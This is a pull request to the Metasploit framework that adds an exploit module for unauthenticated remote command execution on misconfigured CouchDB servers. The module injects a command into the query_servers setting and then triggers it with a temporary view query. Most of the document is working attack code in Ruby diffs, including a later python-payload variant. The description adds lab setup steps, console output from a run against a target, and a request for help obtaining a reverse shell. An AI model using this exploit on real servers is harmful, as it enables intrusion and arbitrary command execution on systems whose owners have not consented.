### PR TITLE
add a couchDB unauth rce module

### DIFF
--- a/modules/exploits/multi/http/couchdb_unauth_exec.rb
+++ b/modules/exploits/multi/http/couchdb_unauth_exec.rb
@@ -29,14 +29,13 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ],
           [ 'URL', 'http://docs.couchdb.org/en/1.6.1/api/server/configuration.html' ]
         ],
-      'Platform'       => %w{ unix win },
+      'Platform'       => %w{ python },
       'Targets'        =>
         [
-          [ 'Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => 'vbs' }],
-          [ 'Unix',    { 'Arch' => ARCH_CMD, 'Platform' => 'unix' }]
+          [ 'Python',  { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' }]
         ],
       'DisclosureDate' => 'Nov 23 2010',
-      'DefaultTarget'  => 1
+      'DefaultTarget'  => 0
     ))
 
     register_options(
@@ -155,12 +154,9 @@ class MetasploitModule < Msf::Exploit::Remote
     return unless unauth?
 
     case target['Platform']
-    when 'win'
-      print_status("#{peer} - Sending command stager...")
-      execute_cmdstager({ :linemax => 2000 })
-    when 'unix'
-      print_status("#{peer} - Sending payload...")
-      execute_command(payload.encoded)
+    when 'python'
+      print_status("#{peer} - Sending python payload...")
+      execute_command("python -c \\\"#{payload.encoded}\\\"")
     end
   end
 end

--- a/modules/exploits/multi/http/couchdb_unauth_exec.rb
+++ b/modules/exploits/multi/http/couchdb_unauth_exec.rb
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     if unauth?
-      Exploit::CheckCode::Vulnerable
+      Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe
     end

--- a/modules/exploits/multi/http/couchdb_unauth_exec.rb
+++ b/modules/exploits/multi/http/couchdb_unauth_exec.rb
@@ -45,50 +45,42 @@ class MetasploitModule < Msf::Exploit::Remote
       ], self.class)
   end
 
-  def valid_json?(json)
-    begin
-      JSON.parse(json)
-      return true
-    rescue JSON::ParserError
-      return false
-    end
-  end
-
   def unauth?
-    uri = normalize_uri(datastore['TARGETURI'])
+    uri = normalize_uri(datastore['TARGETURI'], )
     resp = send_request_cgi(
       'uri'     =>  uri,
       'method'  => 'GET'
     )
-
-    resp && resp.code == 200 && resp.body.include?("couchdb") && valid_json?(resp.body)
+    return false unless resp
+    json_data = resp.get_json_document
+    return false if json_data.empty?
+    resp.code == 200 && json_data.key?('couchdb')
   end
 
-  def execute_command(cmd, opts = {})
-    @dbname = rand_text_alpha_lower(16)
-    @key = rand_text_alpha_lower(16)
-    @value = rand_text_alpha_lower(16)
-
-    # save command
-    # command = "ls > /tmp/test1"
+  def config_query_servers?(cmd)
     uri = normalize_uri(datastore['TARGETURI'], "_config/query_servers/#{@key}")
     resp = send_request_cgi(
       'uri'     =>  uri,
       'method'  => 'PUT',
       'data'    => "\"#{cmd}\""
     )
-    return unless resp && resp.code == 200 && resp.body.include?("\"\"\n")
+    return false unless resp
+    resp.code == 200 && resp.body.include?("\"\"\n")
+  end
 
-    # create datebase
+  def create_database?
     uri = normalize_uri(datastore['TARGETURI'], @dbname)
     resp = send_request_cgi(
       'uri'     =>  uri,
       'method'  => 'PUT'
     )
+    return false unless resp
+    json_data = resp.get_json_document
+    return false if json_data.empty?
+    resp.code == 201 && json_data.key?('ok') && json_data['ok']
+  end
 
-    return unless resp && resp.code == 201 && resp.body.include?("true") && valid_json?(resp.body)
-
-    # create database key
+  def create_database_key_value?
     data = "{\"#{@key}\": \"#{@value}\"}"
     uri = normalize_uri(datastore['TARGETURI'], @dbname, @key)
     resp = send_request_cgi(
@@ -96,11 +88,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'  => 'PUT',
       'data'    => data
     )
+    return false unless resp
+    json_data = resp.get_json_document
+    return false if json_data.empty?
+    resp.code == 201 && json_data.key?('ok') && json_data['ok']
+  end
 
-    return unless resp && resp.code == 201 && resp.body.include?("true") && valid_json?(resp.body)
-
-    # execute code
-    uri = normalize_uri(datastore['TARGETURI'], @dbname, "_temp_view?limit=11")
+  def query_database?
+    uri = normalize_uri(datastore['TARGETURI'], @dbname, '_temp_view?limit=11')
     data = "{\"language\":\"#{@key}\",\"map\":\"\"}"
     resp = send_request_cgi(
       'uri'     =>  uri,
@@ -108,17 +103,43 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype'   => 'application/json',
       'data'    => data
     )
+    return false unless resp
+    json_data = resp.get_json_document
+    return false if json_data.empty?
+    resp.code == 500 && json_data.key?('error')
+  end
 
-    resp && resp.code == 500 && resp.body.include?("error") && valid_json?(resp.body)
-
-    # delete database
+  def delete_database?
     uri = normalize_uri(datastore['TARGETURI'], @dbname)
     resp = send_request_cgi(
       'uri'     =>  uri,
       'method'  => 'DELETE'
     )
+    return false unless resp
+    json_data = resp.get_json_document
+    return false if json_data.empty?
+    resp.code == 200 && json_data.key?('ok') && json_data['ok']
+  end
 
-    return unless resp && resp.code == 200 && resp.body.include?("true") && valid_json?(resp.body)
+  def execute_command(cmd, opts = {})
+    @dbname = rand_text_alpha_lower(16)
+    @key = rand_text_alpha_lower(16)
+    @value = rand_text_alpha_lower(16)
+
+    vprint_status("#{peer} - config query_servers to add commands")
+    return unless config_query_servers?(cmd)
+
+    vprint_status("#{peer} - create a databse")
+    return unless create_database?
+
+    vprint_status("#{peer} - create a database key/value pair")
+    return unless create_database_key_value?
+
+    vprint_status("#{peer} - query database to execute command")
+    query_database?
+
+    vprint_status("#{peer} - delete database")
+    delete_database?
   end
 
   def check

--- a/modules/exploits/multi/http/couchdb_unauth_exec.rb
+++ b/modules/exploits/multi/http/couchdb_unauth_exec.rb
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'URL', 'http://blog.rot13.org/2010/11/triggers-in-couchdb-from-queue-to-external-command-execution.html' ],
-          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
+          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ],
+          [ 'URL', 'http://docs.couchdb.org/en/1.6.1/api/server/configuration.html' ]
         ],
       'Platform'       => %w{ unix win },
       'Targets'        =>
@@ -46,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def unauth?
-    uri = normalize_uri(datastore['TARGETURI'], )
+    uri = normalize_uri(datastore['TARGETURI'], '_config')
     resp = send_request_cgi(
       'uri'     =>  uri,
       'method'  => 'GET'

--- a/modules/exploits/multi/http/couchdb_unauth_exec.rb
+++ b/modules/exploits/multi/http/couchdb_unauth_exec.rb
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'URL', 'blog.rot13.org/2010/11/triggers-in-couchdb-from-queue-to-external-command-execution.html' ],
+          [ 'URL', 'http://blog.rot13.org/2010/11/triggers-in-couchdb-from-queue-to-external-command-execution.html' ],
           [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
         ],
       'Platform'       => %w{ unix win },

--- a/modules/exploits/multi/http/couchdb_unauth_exec.rb
+++ b/modules/exploits/multi/http/couchdb_unauth_exec.rb
@@ -1,0 +1,144 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'CouchDB Unauthentication Remote Command Execution',
+      'Description'    => %q{
+        This module exploits a misconfiguration in CouchDB. If CouchDB api
+        without authentication, attackers can execute os commands with
+        the query_servers option in local.ini.
+      },
+      'Author'         => [
+        'Nixawk', # original metasploit module
+       ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'blog.rot13.org/2010/11/triggers-in-couchdb-from-queue-to-external-command-execution.html' ],
+          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
+        ],
+      'Platform'       => %w{ unix win },
+      'Targets'        =>
+        [
+          [ 'Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => 'vbs' }],
+          [ 'Unix',    { 'Arch' => ARCH_CMD, 'Platform' => 'unix' }]
+        ],
+      'DisclosureDate' => 'Nov 23 2010',
+      'DefaultTarget'  => 1
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(5984),
+        OptString.new('TARGETURI', [ true, 'The path to a default couchDB api', '/'])
+      ], self.class)
+  end
+
+  def valid_json?(json)
+    begin
+      JSON.parse(json)
+      return true
+    rescue JSON::ParserError
+      return false
+    end
+  end
+
+  def unauth?
+    uri = normalize_uri(datastore['TARGETURI'])
+    resp = send_request_cgi(
+      'uri'     =>  uri,
+      'method'  => 'GET'
+    )
+
+    resp && resp.code == 200 && resp.body.include?("couchdb") && valid_json?(resp.body)
+  end
+
+  def execute_command(cmd, opts = {})
+    @dbname = rand_text_alpha_lower(16)
+    @key = rand_text_alpha_lower(16)
+    @value = rand_text_alpha_lower(16)
+
+    # save command
+    # command = "ls > /tmp/test1"
+    uri = normalize_uri(datastore['TARGETURI'], "_config/query_servers/#{@key}")
+    resp = send_request_cgi(
+      'uri'     =>  uri,
+      'method'  => 'PUT',
+      'data'    => "\"#{cmd}\""
+    )
+    return unless resp && resp.code == 200 && resp.body.include?("\"\"\n")
+
+    # create datebase
+    uri = normalize_uri(datastore['TARGETURI'], @dbname)
+    resp = send_request_cgi(
+      'uri'     =>  uri,
+      'method'  => 'PUT'
+    )
+
+    return unless resp && resp.code == 201 && resp.body.include?("true") && valid_json?(resp.body)
+
+    # create database key
+    data = "{\"#{@key}\": \"#{@value}\"}"
+    uri = normalize_uri(datastore['TARGETURI'], @dbname, @key)
+    resp = send_request_cgi(
+      'uri'     =>  uri,
+      'method'  => 'PUT',
+      'data'    => data
+    )
+
+    return unless resp && resp.code == 201 && resp.body.include?("true") && valid_json?(resp.body)
+
+    # execute code
+    uri = normalize_uri(datastore['TARGETURI'], @dbname, "_temp_view?limit=11")
+    data = "{\"language\":\"#{@key}\",\"map\":\"\"}"
+    resp = send_request_cgi(
+      'uri'     =>  uri,
+      'method'  => 'POST',
+      'ctype'   => 'application/json',
+      'data'    => data
+    )
+
+    resp && resp.code == 500 && resp.body.include?("error") && valid_json?(resp.body)
+
+    # delete database
+    uri = normalize_uri(datastore['TARGETURI'], @dbname)
+    resp = send_request_cgi(
+      'uri'     =>  uri,
+      'method'  => 'DELETE'
+    )
+
+    return unless resp && resp.code == 200 && resp.body.include?("true") && valid_json?(resp.body)
+  end
+
+  def check
+    if unauth?
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    return unless unauth?
+
+    case target['Platform']
+    when 'win'
+      print_status("#{peer} - Sending command stager...")
+      execute_cmdstager({ :linemax => 2000 })
+    when 'unix'
+      print_status("#{peer} - Sending payload...")
+      execute_command(payload.encoded)
+    end
+  end
+end


### PR DESCRIPTION
Try to execute os command on couchDB with a unauthentication misconfiguration. Commands could be add to `query_servers` settings  in **/etc/couchdb/local.ini**, and you can make couchDB run the commands with a new query.
- http://blog.rot13.org/2010/11/triggers-in-couchdb-from-queue-to-external-command-execution.html
- https://www.seebug.org/vuldb/ssvid-91389
## Environment Setup
- [ ] kali linux
- [ ] apt-get install couchDB 
- [ ] modify **/etc/couchdb/default.ini**  
  - **bind_address = 0.0.0.0**
## Verification

List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/couchdb_unauth_exec`

```
msf exploit(couchdb_unauth_exec) > show options

Module options (exploit/multi/http/couchdb_unauth_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.100    yes       The target address
   RPORT      5984             yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to a default couchDB api
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   1   Unix


msf exploit(couchdb_unauth_exec) > check
[+] The target is vulnerable.
msf exploit(couchdb_unauth_exec) > run

[*] Started reverse TCP double handler on 192.168.1.101:4444
[*] 192.168.1.100:5984 - Sending payload...
[*] Exploit completed, but no session was created.
```

This a demo version. The module can execute os command, but it fails to reverse a shell.  

![screen shot 2016-05-20 at 10 43 20](https://cloud.githubusercontent.com/assets/7352479/15433378/bbef267e-1e77-11e6-9bc2-3892dfb60e6e.png)

If you want to run a os command - **`uname -a > /tmp/test`**, please modify it as follow.

```
  def exploit
    return unless unauth?

    case target['Platform']
    when 'win'
      print_status("#{peer} - Sending command stager...")
      execute_cmdstager({ :linemax => 2000 })
    when 'unix'
      print_status("#{peer} - Sending payload...")
      execute_command("uname -a > /tmp/test")
    end
  end
```

![screen shot 2016-05-20 at 10 47 22](https://cloud.githubusercontent.com/assets/7352479/15433567/83303958-1e78-11e6-8ccc-4cbf0ed5b3b7.png)

Any body helps me how to gain a shell ?  @wchen-r7  @wvu-r7  @bcook-r7 @jhart-r7 
